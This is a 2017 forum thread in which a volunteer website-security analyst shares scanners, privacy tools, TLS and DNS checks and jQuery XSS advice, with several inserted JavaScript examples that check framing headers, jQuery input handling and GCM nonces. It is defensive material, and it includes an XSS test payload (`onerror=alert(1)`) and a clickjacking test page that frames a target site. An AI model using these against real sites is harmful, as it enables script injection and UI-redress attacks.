Post by: polonus on August 14, 2017, 01:42:00 PM
DNS CAA should be implemented now during September. It is a kind of genuine administrative control whether the domain name is in the DNS record. More vague than HPKP testing for browsers where it is checked against whitelisted public keys.

In case of DNS CAA with all the different CA's the check is not often well performed and also often social engineering sensitive.

Check: https://caatest.co.uk/vendercartoabom.com.br where we could not find any - hostname does not match certificate for this PHISHING site, certificate has not been correctly installed with Hostgator Wildcard - Comodo. (carding abuse?).

How to generate CAA records: https://sslmate.com/labs/caa/

Testing: https://www.ssllabs.com/ssltest/  also compare to cryptoreport.websecurity.symantec.com/checker/
and https://observatory.mozilla.org/  and http://www.dnsinspect.com/

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on August 15, 2017, 10:57:08 PM
Check your old add-ons for compatibility: https://addons.mozilla.org/en-US/firefox/addon/add-on-compatibility-reporter/

Read about the profile clash to come: https://github.com/Aris-t2/ClassicThemeRestorer/issues/299

pol
Title: Re: Tests and other Media topics
Post by: DavidR on August 16, 2017, 12:00:01 AM
Check your old add-ons for compatibility: https://addons.mozilla.org/en-US/firefox/addon/add-on-compatibility-reporter/
<snip>

Ha, these are going to be pretty redundant in three months as support for Legacy updates will end. It is said that 80% of the add-ons on the Mozilla add-ons are still Legacy add-ons.

But you don't need the add-on-compatibility-reporter, simply go to the firefox add-ons section in the browser as all Legacy add-ons are already flagged as such.  Only one of my add-ons isn't Legacy.
Title: Re: Tests and other Media topics
Post by: bob3160 on August 16, 2017, 12:21:45 AM
(http://screencast-o-matic.com/screenshots/u/Lh/1502835654354-43451.png)
Looks like
Avast Online Security needs some work.
Title: Re: Tests and other Media topics
Post by: polonus on August 20, 2017, 12:55:01 PM
Why polonus is scanning what he is scanning and reporting what he is reporting for instance in the "virus and worms"?
All of it in vain? Some here pay attention, although as a rule it goes by greatly unnoticed....
(No I do not mean you, Eddy, no I do not mean you Pondus and others).

Nobody gives a hoot what you detect...
Read here why...https://medium.com/@homakov/why-it-sucks-to-be-a-security-researcher-8a1d17fbffe8

link info credits go to Egor Homakov

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on August 24, 2017, 07:51:08 PM
protection against clickjacking

In the document HEAD element, add the following
Code:
<style id="antiClickjack">body{display:none !important;}</style>

<script type="text/javascript">
   // Not framed: we are the top-level document, so remove the hiding style again.
   if (self === top) {
       var antiClickjack = document.getElementById("antiClickjack");
       antiClickjack.parentNode.removeChild(antiClickjack);
   } else {
       // Framed by another page: break out of the frame and keep the body hidden.
       top.location = self.location;
   }
</script>
info credits go to StackOverflow's Prabin Tp

Check for clickjacking with https://asafaweb.com/  &  https://www.owasp.org/index.php/Testing_for_Clickjacking_(OTG-CLIENT-009)
like
Code:
<html>
   <head>
     <title>Clickjack test page</title>
   </head>
   <body>
     <p>Website is vulnerable to clickjacking!</p>
     <iframe src="http://www.target.site" width="500" height="500"></iframe>
   </body>
</html>
Protection for client users: https://www.lifewire.com/how-to-protect-yourself-from-clickjacking-attacks-2487178

polonus
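As an added example (not code from the post, nor from asafaweb or OWASP), here is how the header side of such a clickjacking check can be scripted: it reads X-Frame-Options and CSP frame-ancestors from a response's headers and reports whether framing is blocked, including the case where a permissive CSP overrides a strict X-Frame-Options. The function names and the sample header sets are my own constructions, not taken from any real site.

```javascript
// Added example: classify a page's clickjacking defence from its HTTP response
// headers, the way header-based scanners do. `headers` is a plain object whose
// values are a string or an array of strings (repeated headers).

function parseCspDirectives(policy) {
  // A policy is "name source ...; name source ...". The first occurrence of a
  // directive name wins; later duplicates are ignored, as browsers do.
  const directives = {};
  for (const part of policy.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!(name in directives)) directives[name] = tokens.slice(1);
  }
  return directives;
}

function frameAncestorsVerdict(sources) {
  const s = sources.map((x) => x.toLowerCase());
  if (s.includes("'none'")) return { status: 'protected', by: "frame-ancestors 'none'" };
  // '*' or a bare scheme lets every origin (of that scheme) frame the page.
  if (s.some((x) => x === '*' || x === 'http:' || x === 'https:')) {
    return { status: 'unprotected', by: `frame-ancestors ${s.join(' ')} allows any origin` };
  }
  return { status: 'protected', by: `frame-ancestors ${s.join(' ')}` };
}

function frameProtection(headers) {
  // Normalise header names to lower case and collect repeated headers.
  const byName = {};
  for (const [name, value] of Object.entries(headers)) {
    const key = name.toLowerCase();
    byName[key] = (byName[key] || []).concat(value);
  }
  const notes = [];

  // 1. CSP frame-ancestors: browsers that support it ignore X-Frame-Options.
  for (const policy of byName['content-security-policy'] || []) {
    const d = parseCspDirectives(policy);
    if (d['frame-ancestors']) return { ...frameAncestorsVerdict(d['frame-ancestors']), notes };
  }
  const reportOnly = byName['content-security-policy-report-only'] || [];
  if (reportOnly.some((p) => 'frame-ancestors' in parseCspDirectives(p))) {
    notes.push('frame-ancestors only in a Report-Only policy; it is reported, not enforced');
  }

  // 2. X-Frame-Options: DENY and SAMEORIGIN protect, ALLOW-FROM is obsolete.
  const xfo = byName['x-frame-options'] || [];
  if (xfo.length > 1) notes.push('several X-Frame-Options headers sent; send exactly one');
  if (xfo.length > 0) {
    const raw = xfo[0].trim();
    const value = raw.toUpperCase();
    if (value === 'DENY' || value === 'SAMEORIGIN') {
      return { status: 'protected', by: `X-Frame-Options ${value}`, notes };
    }
    if (value.startsWith('ALLOW-FROM')) {
      notes.push('ALLOW-FROM is ignored by current browsers; use CSP frame-ancestors instead');
    } else {
      notes.push(`invalid X-Frame-Options value "${raw}" is ignored by browsers`);
    }
    return { status: 'unprotected', by: `X-Frame-Options ${raw}`, notes };
  }

  // 3. No header at all: only a script-based frame-buster (as in the post) is
  //    left, and that is no substitute for a header the browser itself enforces.
  return { status: 'unprotected', by: 'no X-Frame-Options or CSP frame-ancestors header', notes };
}

// Constructed sample responses (not captured from any real site).
const SAMPLE_HEADERS = {
  hardened: { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'none'", 'X-Frame-Options': 'DENY' },
  xfoOnly: { 'x-frame-options': 'sameorigin' },
  wildcard: { 'Content-Security-Policy': 'frame-ancestors *', 'X-Frame-Options': 'DENY' },
  legacy: { 'X-Frame-Options': 'ALLOW-FROM https://partner.example' },
  bare: { 'Content-Type': 'text/html' },
};

for (const [name, headers] of Object.entries(SAMPLE_HEADERS)) {
  const v = frameProtection(headers);
  console.log(`${name}: ${v.status} (${v.by})${v.notes.length ? ' - ' + v.notes.join('; ') : ''}`);
}
```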
Title: Re: Tests and other Media topics
Post by: polonus on August 24, 2017, 10:04:13 PM
With Mozilla now more and more going the Google Chrome monopoly way.
What is your experience with the following browser?

https://cliqz.com/en/

I see the old firefox mission fans now turn to Palemoon or Opera. On Android we have Brave.

Will all browsers be "just another browser" soon or will there still be an escape for those,
that want to avoid crap, scam, spam, mal-ads, tracking and other forms of extensive profiling?

The more you protect the more you stand out to these evil forces that invade your devices.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 25, 2017, 06:57:58 PM
Google opens up somewhat more on Titan:

Discussion on it here: https://news.ycombinator.com/item?id=15093129
and
https://www.blackhat.com/us-17/briefings/schedule/#firmware-is-the-new-black---analyzing-past-three-years-of-biosuefi-security-vulnerabilities-6924

Probably their management controller was not secure enough, and now they will protect every byte of their proprietary code the hard-coded way, so even those with access to it cannot manipulate it, so Google may lead and call the shots always.
Only hope is that every one of these self-made security chips with TPM and secure boot will follow the original blue-print  :D

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 26, 2017, 11:53:07 AM
Titan security goes deep. While it even goes deeper than TPM and secure boot.
Doing somewhat more than standard iLO/Drac/BMC are capable of.
So it is additional or rather better.

Reverse engineering this is possible but comes at a price, as Google is google.
Reverse engineering chips can be done and is not outside the capabilities of NSA for instance.
Read: https://www.blackhat.com/docs/us-15/materials/us-15-Thomas-Advanced-IC-Reverse-Engineering-Techniques-In-Depth-Analysis-Of-A-Modern-Smart-Card.pdf
But it certainly is easier when you know all of the masterset and know the design as the innerlining of your pocket,
than when you have to start from scratch with functions of a to that time unknown chip.

So even Google staff with access would have a hard time doing this and it is outside the scope of the normal user/hacker/entity.

Now we can come to understand why Mainland China ousted Google from their infrastructure.
On the other hand we come to understand that for getting some form of high trust security, the going gets narrow and narrower still.
We also have to reckon with the larger developer community that does not know about proper security. It is just an inner circle of specially trained Technical IT, that knows all the ins and outs or are specially trained for a particular security aspect.

Anyway the coming of the Titan chip tells us that security on the common infrastructure cannot be (fully) trusted.
So when it just says "google" on a container of hardware, it just cannot be trusted,
while the mobo of Johnny's weblike shop could be.

This is one side of the fascistoid Big Big Commerce times we live in, it is Alice in Wonderland revamped over and over,
and while you think you are secure and inside a trusted environment, it asks you to think hard again.

polonus (volunteer website security analyst and website error-hunter)


Title: Re: Tests and other Media topics
Post by: polonus on August 27, 2017, 03:34:22 PM
Adblocking basically does not exist on android.
Read: https://www.theregister.co.uk/2017/08/25/ad_blocking_doesnt_exist_on_mobile/

I use Brave and Disconnect Search and Avast Mobile solutions a great trio.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 31, 2017, 05:15:51 PM
The newer alternative to Duckduckgo DeepSearch coming:

https://deepsearch.tsignal.io/

But for real search results you cannot go without Google: https://arstechnica.com/information-technology/2017/02/new-aslr-busting-javascript-is-about-to-make-drive-by-exploits-much-nastier/  and then  https://boingboing.net/2017/02/15/researchers-show-they-can-beat.html  and   https://www.vusec.net/projects/anc/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 02, 2017, 08:27:01 PM
Some website security scan proposals:

Test your website whether it has last best policy website security.
Score in percent.  Scan here example : https://en.internet.nl/domain/www.minbermedia.kz/91228/
a low grade status 35% website.

Additional DNS scans: https://frag.co.uk/tools/?page=source&host=www2.eu
and http://dnscheck.pingdom.com/?domain=

Word Press resources -> PHP Cross Reference of WordPress Trunk
-> https://wpseek.com/source/wp/latest/nav.html?wp-content/themes/twentyfourteen/functions.php.source.html

then check at: https://hackertarget.com/wordpress-security-scan/

and check later for retirable jQuery code with http://retire.insecurity.today/

finally here: https://observatory.mozilla.org/

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on September 04, 2017, 12:25:43 PM
WODC of the Technical University Delft in The Netherlands comes up with
a new methodology to classify threat actors,
based on the motives of such cyber actors.

Cyber researchers are also classified, but as non-actors, not posing a threat.

See added typology...

polonus (volunteer website security analyst and website error-hunter)  (no-actor)
Title: Re: Tests and other Media topics
Post by: polonus on September 05, 2017, 06:58:40 PM
Test website for SSL and the use of latest security techniques:

Re: http://toolbar.netcraft.com/site_report?url=https://voordebuurt.nl
21%  https://en.internet.nl/domain/voordebuurt.nl/92003/

check on certification: https://cryptoreport.websecurity.symantec.com/checker/  &   https://www.digicert.com/help/

See complete results: https://observatory.mozilla.org/analyze.html?host=voordebuurt.nl#third

sub-results: https://www.htbridge.com/ssl/?id=rU3dptL3  &   https://hstspreload.org/?domain=voordebuurt.nl  (failed here)...

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 06, 2017, 09:57:06 PM
Ransomware IP trackers:

https://ransomwaretracker.abuse.ch/tracker/

http://vxvault.net/ViriList.php?IP=207.58.143.135

https://www.scumware.org/report/207.58.143.135.html

https://tracker.h3x.eu/download/400  re: https://tracker.h3x.eu/about/400  (with more public tracker lists)

https://github.com/firehol/blocklist-ipsets/blob/master/hphosts_emd.ipset

http://6ca08333.fingerprinted.domains/


enjoy, my good friends, enjoy,


polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on September 17, 2017, 02:13:40 PM
Various best known URL Scan Resources:

Google Safe Browsing Diagnostic   See malware diagnostics: https://transparencyreport.google.com/safe-browsing/search#url=
McAfee Threat Intelligence   Instant lookup http://www.mcafee.com/threat-intelligence/domain/?domain=
McAfee SiteAdvisor   Instant lookup http://www.siteadvisor.com/sites/
Norton Safe Web   Instant lookup https://safeweb.norton.com/report/show?url=
AVG ThreatLabs   Instant lookup http://www.avgthreatlabs.com/sitereports/domain/
SpamHaus Domain Block List   Instant lookup https://www.spamhaus.org/query/dbl?domain=
Web of Trust (WOT)   Instant reputation lookup https://www.mywot.com/en/scorecard/freeflightoffers.com 
(WOT scan resource lost trust once)
Alexa   Website ranking/statistics http://www.alexa.com/siteinfo/
DomainTools   Review domain Whois data http://whois.domaintools.com/ (validation required)
Recommended SecureBrain Gred   Real-time URL/links scan http://check.gred.jp/?url=
Unmask Parasites   Real-time URL quick scan http://www.unmaskparasites.com/security-report/?page=
VirusTotal   Lookup website risk https://www.virustotal.com/en/#url
F-Secure Browsing Protection Lookup website risk    https://www.f-secure.com/pl_PL/welcome
Trend Micro Site Safety Lookup website risk   https://global.sitesafety.trendmicro.com/
URL Void    Lookup website risk http://www.urlvoid.com/
PhishTank   Search website/URL phishing reports http://www.phishtank.com/
ScumWare.org   Search website/URL malware reports http://www.scumware.org/search.scumware
StopBadware.org Clearinghouse   Search website malware reports https://www.stopbadware.org/clearinghouse/search
MalwareURL   Search website malware reports http://www.malwareurl.com/listing-urls.php
urlQuery   Run a real-time scan of a specific URL http://urlquery.net/
Sucuri SiteCheck   Run a real-time scan of a specific URL http://sitecheck.sucuri.net/
Comodo Site Inspector   Run a real-time scan of a specific URL http://siteinspector.comodo.com/
Zscaler Zulu URL Risk Analyzer   Run a real-time scan of a specific URL https://zulu.zscaler.com/
Quttera   Run a real-time scan of a specific URL or website https://www.quttera.com/#online url malware scanner

Enjoy, my good friends, enjoy...
Title: Re: Tests and other Media topics
Post by: polonus on September 17, 2017, 08:22:35 PM
A specific Scientology critical resource: https://umbraxenu.no-ip.biz/mediawiki/index.php/Anonymous_and_critic_sites

A good (re)searcher can beat any hacker any time all of the time.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 22, 2017, 12:42:34 PM
How to track url redirects in the browser: https://superuser.com/questions/242138/how-to-track-url-redirects-in-the-browser

and to see where they end up: http://redirectdetective.com/

Enjoy, my good avast friends, enjoy,

polonus (volunteer website security analyst and website error-hunter)

Oh, Firebug Light, nice extension...
Title: Re: Tests and other Media topics
Post by: polonus on September 24, 2017, 03:56:44 PM
JQuery is a sink!

Read: http://blog.mindedsecurity.com/2011/07/jquery-is-sink.html
and https://ttmm.io/tech/jquery-xss/

Understand why polonus continuously scans here: http://retire.insecurity.today/  and here: http://www.domxssscanner.com/

A function or method that can be considered as insecure, when one of its arguments comes from untrusted input

(check at https://observatory.mozilla.org/  whether content is being protected properly CORS
- same origin - SRI hashes generated)

and is not correctly being validated according to the layer the function is communicating to.

jQuery.html is a sink and no one so far complains.

jQuery is also designed to perform different operations based on argument type and content.

Using the same interface for query and executing is a "bad idea".

jQuery as selector?

Never use jQuery() or $() with an unvalidated argument. No matter what version is being used. Read the code!

jQuery developers retire old version (zip all for reference). What one acquires, one also should retire!
Change and lock jQuery do-everything behaviour.

Not allow client side into Http encode URI Component. Do not use $.html() with untrusted input.
Check they work as expected <.*\?>
Test your RegExps.
Client Request Proxy is Frameable by design!
unfriendly header added
x-Ms-Origin: http://cyber.at.track.er
XMLHttpRequest.attr=val
IE sees some code as valid JSON you can still be left with an unvalidated object!
Be shy using 3rd party services that produces 3rd party surprises.
HTML Injection Vuln.
Test an' Audit all 3rd party code (jsunpack)
Angular.JS has interesting injections.

Info credits go to Stefano Di Paola of minded security dot com.

jQuery methods that directly update the DOM

.after() same with append, before, html, insertAfter, insertBefore, prepend, prependTo, replaceAll, replaceWith, unwrap, wrap, wrapAll, wrapInner, all like .method(); text() updates DOM but is safe.

Do not send unvalidated data to these methods or properly escape before doing so.

More danger from or $danger immediately evaluates the input e.g. $("<img src =x  onerror = alert(1)>")

jQuery.globalEval()

All event handlers: bind(events), bind(type [,data], handler()), .on(), add(html).

More research is needed to identify all the safe versus unsafe methods.

polonus (volunteer website security analyst and website error-hunter)

P.S. Interesting read on the dangers of 3rd party scripts:
https://css-tricks.com/potential-dangers-of-third-party-javascript/

and https://hackcabin.com/post/managing-async-dependencies-javascript/

Damian
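To make the "read the code" advice in the post concrete, here is an added example (my own code, not jQuery's and not from the post) that reproduces the test jQuery applies to a string passed to $() to decide between "parse as HTML" (the sink) and "run as a selector", plus a small defensive wrapper for the common `$(location.hash)` pattern. The two regular expressions are jQuery's rquickExpr as found in the 1.8 and 1.9+ sources; the function names and the sample inputs (apart from the `<img>` string quoted in the post) are constructed for this example.

```javascript
// Added example: reproduce the test jQuery applies to the string given to $() to
// decide between "parse as HTML" (a sink) and "run as a selector", so untrusted
// input can be screened before it reaches jQuery. The two patterns are jQuery's
// own rquickExpr, from 1.8.x and from 1.9 onward.

const RQUICK_PRE_1_9 = /^(?:[^#<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/; // '<' anywhere is HTML
const RQUICK_1_9_PLUS = /^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/;      // must start with '<'

function jqueryStringKind(input, version) {
  const m = (version < 1.9 ? RQUICK_PRE_1_9 : RQUICK_1_9_PLUS).exec(input);
  if (m && m[1]) return 'html';      // handed to the HTML parser; inline handlers fire
  if (m && m[2]) return 'id';        // getElementById fast path
  return 'selector';                 // handed to Sizzle / querySelectorAll
}

// Defensive wrapper for the common "$(location.hash)" pattern: accept only a
// plain element id and hand back a selector that can never be read as HTML.
function hashToSelector(hash) {
  const m = /^#([A-Za-z][\w-]*)$/.exec(hash);
  return m ? `#${m[1]}` : null;
}

// Constructed inputs; the <img> string is the one quoted in the post.
const INPUTS = [
  '#main',
  'div.content',
  '<img src=x onerror=alert(1)>',
  'text <b>bold</b>',
];
for (const s of INPUTS) {
  console.log(
    JSON.stringify(s),
    'jQuery 1.8:', jqueryStringKind(s, 1.8),
    ' jQuery 3.2:', jqueryStringKind(s, 3.2),
    ' hashToSelector:', hashToSelector(s),
  );
}
```

The 'text <b>bold</b>' input is the version-dependent case: jQuery 1.8 parses it as HTML because a tag appears anywhere in the string, while 1.9 and later only do so for strings that start with '<'.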
Title: Re: Tests and other Media topics
Post by: polonus on September 26, 2017, 10:44:20 PM
All you wanna know on javascript: http://exploringjs.com/
The latest developments Async functions: http://exploringjs.com/es2016-es2017/ch_async-functions.html#ch_async-functions

Recent news: https://www.theregister.co.uk/2017/09/26/allen_wirfs_brock_interview/

Security issues: https://docstore.mik.ua/orelly/webprog/jscript/ch21_01.htm  and many, many more...

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 04, 2017, 09:25:31 PM
Checking on PHP code -> http://evuln.com/tools/php-security/

Example see attached txt... (this for security reasons, as the security savvy will understand why code as txt file)

polonus

P.S. consider exploits like these: https://www.exploit-db.com/exploits/35743/
Then you like to get such a reaction of the server: "Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.".

D
Title: Re: Tests and other Media topics
Post by: polonus on October 08, 2017, 08:23:33 PM
How to check on blocklist - added this one to uBlock 0 - http://sanyalnet-cloud-vps.freeddns.org/mirai-ips.txt
Checked this IP 1.180.235.36 -> https://www.abuseipdb.com/check/1.180.235.36
reported there 23 times -> also here: https://cleantalk.org/blacklists/1.180.235.36

pol
Title: Re: Tests and other Media topics
Post by: polonus on October 09, 2017, 08:39:11 PM
uBlock Origin found a way against this, but initially this malvertising campaign overcame adblockers:

https://www.technibble.com/forums/threads/malvertising-campaign-finds-a-way-around-ad-blockers.75220/

N.B. Disable "Non Proxied UDP (WebRTC) in your browser!
How to in various browsers: https://whoer.net/blog/article/how-to-disable-webrtc-in-various-browsers/

Check your browser: https://panopticlick.eff.org/

Remember every added extension makes it easier to uniquely make your browser stand out for profiling,
but there actually is no (easy nor hard) way to escape Big Brother to-day...

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 10, 2017, 10:09:12 PM
Some resources to check malware sites on.
This website no longer found active, was reported here as with generic malware:

https://otx.alienvault.com/indicator/hostname/www.stocktagfiles.com/

https://www.scumware.org/report/52.48.70.144.html

https://sitecheck.sucuri.net/results/www.stocktagfiles.com

https://www.securityhome.eu/malware/malware.php?mal_id=18398464835769f37b8669a6.43334630

https://minotr.net/detail?md5=1700ed9864bf36f580fd6efbaf1e40b0

https://www.threatcrowd.org/ip.php?ip=52.42.20.109

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 11, 2017, 12:45:53 PM
In firefox we have the beautiful Calomel extension.
But how to check beyond the green padlock inside Google Chrome,
we find the source via Control+Shift+I

How to check certificates under Google Chrome:

1. Go to the website you wanna check the certificate for
2. Push the F12 button
3. Within the window that has opened up, go to the small tab "Security"
4. Click then the button to View Certificate   (info credits go to Vixen).

Later you can check additionally:
https://cryptoreport.websecurity.symantec.com/checker/
and/or https://www.ssllabs.com/ssltest/
and https://www.digicert.com/help/
or here https://threatintelligenceplatform.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 13, 2017, 11:01:41 AM
Where is your Internet connected out?

Where does the cloud take your packets?

See: https://www.peeringdb.com/asn/63949  (example for FOSCAM etc.)

Interesting background read from Chris Baker: https://dyn.com/blog/who-controls-the-internet/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 17, 2017, 12:45:45 PM
Actual security related info.

Nonces that eventually aren't real "numbers used once". Such nonces seem to be a risk.
So time to implement additional security header security and check on https sites for "nonces".

An example of secure nonces we see here for example: https://gcm.tlsfun.de/check.php?host=www.terracotta.org
Quote
Collected 3 GCM nonces from www.terracotta.org

aa0015c9df6c8a46
aa0015c9df6c8a47
aa0015c9df6c8a48

NOT VULNERABLE

This host uses a counter starting with a random value (probably OpenSSL). This is secure.

For a detailed background read our paper: Nonce-Disrespecting Adversaries: Practical Forgery Attacks on GCM in TLS. More supplemental information is in our Github repository.

Enjoy, my good friends, enjoy,

polonus (volunteer website security analyst and website error-hunter)
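As an added example (my own code, not the tlsfun check's source and not from the post), here is the classification that check reports, applied to the explicit 8-byte GCM nonces collected from one TLS connection: a repeat is flagged as vulnerable, a +1 sequence as a counter with a zero or random start, and anything else as random nonces with their birthday bound. The three www.terracotta.org nonces are the ones quoted in the post; the other sample sets and the function names are constructed.

```javascript
// Added example: classify the explicit (8-byte) GCM nonces collected from one TLS
// connection, the way the gcm.tlsfun.de check reports them. Nonces are given as
// 16 hex digits; BigInt keeps the full 64-bit values exact.

function classifyGcmNonces(hexNonces) {
  if (hexNonces.length < 2) throw new Error('need at least two nonces to see a pattern');
  const values = hexNonces.map((h) => {
    if (!/^[0-9a-fA-F]{16}$/.test(h)) throw new Error(`not an 8-byte hex nonce: ${h}`);
    return BigInt('0x' + h);
  });

  // Any repeat under the same key is fatal: it leaks the GHASH authentication key.
  if (new Set(values).size !== values.length) {
    return { kind: 'repeated', vulnerable: true, detail: 'a nonce was used twice' };
  }

  // Each nonce exactly one above the previous one: a counter.
  const isCounter = values.every((v, i) => i === 0 || v === values[i - 1] + 1n);
  if (isCounter) {
    const start = values[0] === 0n ? 'zero' : 'random';
    return {
      kind: 'counter',
      start,
      vulnerable: false,
      detail: start === 'zero'
        ? 'counter starting at zero; safe as long as every connection gets a fresh key'
        : 'counter starting at a random value (OpenSSL style); safe',
    };
  }

  // No repeat and no counter: random nonces. They only stay unique by chance, so
  // the birthday bound for the records sent under one key is what matters.
  return {
    kind: 'random',
    vulnerable: false,
    detail: 'random nonces; about a 50% chance of a repeat after 2^32 records under one key',
  };
}

// Probability that n random 64-bit nonces contain at least one repeat (birthday
// bound n*(n-1)/2 / 2^64, capped at 1). At n = 2^32 it is roughly 0.5.
function birthdayCollisionProbability(records) {
  return Math.min(1, (records * (records - 1)) / 2 / 2 ** 64);
}

// Sample inputs: the three nonces quoted in the post, plus constructed sets.
const SAMPLES = {
  terracotta: ['aa0015c9df6c8a46', 'aa0015c9df6c8a47', 'aa0015c9df6c8a48'],
  fromZero: ['0000000000000000', '0000000000000001', '0000000000000002'],  // constructed
  reused: ['0000000000000001', '0000000000000002', '0000000000000001'],    // constructed
  random: ['9c1d7e20a4b3f5e6', '1a2b3c4d5e6f7081', 'deadbeefcafef00d'],    // constructed
};

for (const [name, nonces] of Object.entries(SAMPLES)) {
  const r = classifyGcmNonces(nonces);
  console.log(`${name}: ${r.vulnerable ? 'VULNERABLE' : 'NOT VULNERABLE'} - ${r.detail}`);
}
```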
Title: Re: Tests and other Media topics
Post by: polonus on October 18, 2017, 08:03:28 PM
Certificate transparency for avast webforum according to the netcraft report:

Quote
Certificate transparency   
Signed Certificate Timestamps (SCTs)

Source        Log              Log ID                                          Timestamp             Signature Verification
Certificate   Google Pilot     pLkJkLQYWBSHuxOizGdwCjw1mAT5G9+443fNDsgN3BA=   2015-03-10 16:54:10   Success
Certificate   Google Aviator   aPaY+B9kgr46jO65KB1M/HFRXWeT1ETRCmesu09P+8Q=   2015-03-10 16:54:10   Success
Certificate   DigiCert 1       VhQGmi/XwuzT9eG9RLI+x0Z2ubyZEVzA75SYVdaJ0N0=   2015-03-10 16:54:10   Success


Verify here: https://www.chromium.org/Home/chromium-security/certificate-transparency

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on October 22, 2017, 02:18:20 PM
In part experimental and results should be taken cum grano salis (with a grain of salt):
mozilla ssh_scan api results in a dockerized way (all other forms are too abuse-prone, so you risk becoming blocked),

Scan a sites privacy score (beta) here: https://privacyscore.org/site/33642/  (as an example we took avast forum site scan).
source code -> https://github.com/mozilla/ssh_scan_api
Avast forum site results as json: https://privacyscore.org/site/33642/json/

3rd party embeds, 3rd party trackers,
4 issues on unreliable encryption - HSTS and HSTS pre-loading not installed, not using Public Key pinning.
No check on mixed content and no check for CSS attempts and ticketbleed (experimental).
No protection found against LOGJAM attacks. More unreliable checks issues...

Another lesson to be learned about optimal website security,

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on October 24, 2017, 11:03:20 PM
Recent research has established that working a feature rich browser will set you out uniquely,
and this means an enhanced privacy risk.

Read: https://today.uic.edu/bloated-browser-functionality-presents-unnecessary-security-privacy-risks 
Info source: Peter Snyder.

You can check the uniqueness of your browser here: https://amiunique.org and https://amiunique.org/fp

If we break up the identifying factors, just a tiny bit of profiling is given off by my browser user agent.
Over 30% comes because of the browser header, that I send to the server.
Another 14% leaks through the way my browser processes decoded content.
A tiny bit of what I give away is through the language(s) I use (Dutch and Polish).
0,22% comes from used plug-ins and that is contradictory to above findings,
but detail of the individual plug-ins speak loudly with over 75% to set me out uniquely against all other browsers.
And do not forget the 33% by the adblocker I use.

Therefore the much liked uBlock Origin adblocker by our forum users,
is still "in its teens" and needs further development. It will break a lot of sites.

By far the best plug-in that works to the contrary and makes you less unique by heaps is good old "Request Policy",
and here our good forum member, DavidR, was right all the way. You need not convince us any further, DavidR!

Well the use of NoScript or uMatrix is also advisable, although the unsavvy do not always know what and how to toggle properly.

In these days of dwindling privacy or as Americans say: "Privacy that no longer exists" you have less unique browsers,
one is the Brave browser, developed by the inventor of javascript, without plug-ins and all in the browser
with a one profile for all (except for canvas and other fingerprinting). Brave as browser app a must on android!

On the other side of the scope we have the nonsensical gimmick Browzar browser, which I would not recommend.

Finally to be less outstanding within the big browser monoculture of Big Blue, firefox and Google's chrome,
I would go for a Japanese browser like Sleipnir as one with this browser has a lesser attack surface on the Western Hemisphere.

polonus (volunteer website security analyst and website error-hunter)


Title: Re: Tests and other Media topics
Post by: DavidR on October 24, 2017, 11:43:19 PM
Well it was able to tell what virtually every browser gives, which browser and version you are using, your OS and version, plus your language, but that isn't going to get them very far in identifying the user.

EDIT: Whilst this is all well and good, you do have to selectively allow certain sites or you won't see all content.
Title: Re: Tests and other Media topics
Post by: polonus on October 25, 2017, 01:24:11 AM
Reported by Lukasz Olejnik this privacy threat: https://blog.lukaszolejnik.com/privacy-of-web-request-api/
Source:  https://www.theregister.co.uk/2017/10/06/another_w3c_api_exposing_users_to_browser_snitching/

Info credits for reporting go to Bitwiper.

A range of browser privacy scanners: http://www.malwarehelp.org/online_browser_security_and_privacy_scanners.html
like for instance: https://www.leader.ru/secure/who.html  and extended: https://do-know.com/privacy-proxy-test.html?

Even explains I am in a FVEY country - the Netherlands, also extra private internal IPs are given. 2 CPU cores detected.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 30, 2017, 05:42:29 PM
L.S.

All hope's not gone - the answer to a total loss of privacy
and against centralised snooping on all of your Interwebs interactions =
decentralised VPN powered by blockchain,
an innovative development, read here: https://mysterium.network/

The clock is slowly ticking the last remnants of your Internet data integrity away,
with Google now also phasing out their public key pinning policy,
who will be making up the logs to check cert transparency against?

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 01, 2017, 04:21:48 PM
Do you consider bitcoin mining on your cycles worse than ads?

Some have it blocked by a good ad-blocker, some with anti-mining extensions.

What are the privacy implications of such a miner?

Flagged as malcode here: https://urlquery.net/report/6c776095-c1f1-4442-afc3-4d297841c802
3 to flag: https://www.virustotal.com/nl/url/b0827282045e14fe7538f204e94e13fe2491f653ed59369e5d8414feeb50e3e7/analysis/1509548406/

Some warnings here, but no tracking: https://privacyscore.org/site/33952/  (No HSTS,
server is vuln. to Lucky13 and BEAST & DROWN attacks, no secure client renegotiation set, no security headers set).

F-status and recommendations: https://observatory.mozilla.org/analyze.html?host=coinhive.com

No issues on the mining script itself, but overflow to: Results from scanning URL: -https://static.xx.fbcdn.net/rsrc.php/v3/y2/r/184G4bWm-rw.js
Number of sources found: 92
Number of sinks found: 24 -> -static.xx.fbcdn.net/rsrc.php/v3/y2/r/184G4bWm-rw.js benign

polonus (volunteer website security analyst and website error-hunter)

P.S. And when there are blockchains, there could be malware round the corner:
https://securelist.com/tales-from-the-blockchain/82971/

Damian
Title: Re: Tests and other Media topics
Post by: polonus on November 02, 2017, 02:50:15 PM
What are the privacy implications of this webproxy?

